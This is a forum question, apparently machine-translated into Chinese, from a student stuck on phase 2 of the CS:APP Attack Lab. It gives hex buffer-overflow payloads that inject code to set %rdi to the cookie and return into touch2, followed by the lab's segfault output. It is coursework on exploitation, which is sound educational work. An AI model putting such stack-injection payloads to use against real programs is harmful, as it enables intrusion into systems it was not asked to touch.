攻击实验室 - 第 2 阶段 - 失火

问题描述 投票:0回答:0

有人可以帮助解决攻击实验室第 2 阶段吗? 我按照 GitHub 上的教程进行操作,但是没有通过。

cookie.txt enter image description here phase2.s enter image description here phase2.d enter image description here 阶段2.txt enter image description here

在getbu设置断点后,运行汇编代码并反汇编得到0x55672c78作为寄存器%rsp的地址。 enter image description here

这里是touch2的拆解 enter image description here

我试过改phase 2.txt 通过有

48 c7 c7 e7 e9 88 57 c3 00 00 00 00 00 00 00 00 0 0 k 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 2c 67 55 00 00 00 00 86 5f 55 55 55 55 00 00

然后我收到的失败消息是:

Cookie:0x5788e9e7 输入字符串:Touch2!:您调用了 touch2(0x5788e9e7) 具有目标 ctarget 的 2 级有效解决方案 哎哟!:你造成了分段错误! 祝下次好运 失败

然后我改成:

48 c7 c7 e7 e9 88 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 00 00 00 00 00 00 00 86 5f 55 55 55 55 00 00 78 2c 67 55 00 00 00 00

这是我仍然收到的失败消息 enter image description here

assembly disassembly buffer-overflow marching-cubes getbuffer
© www.soinside.com 2019 - 2024. All rights reserved.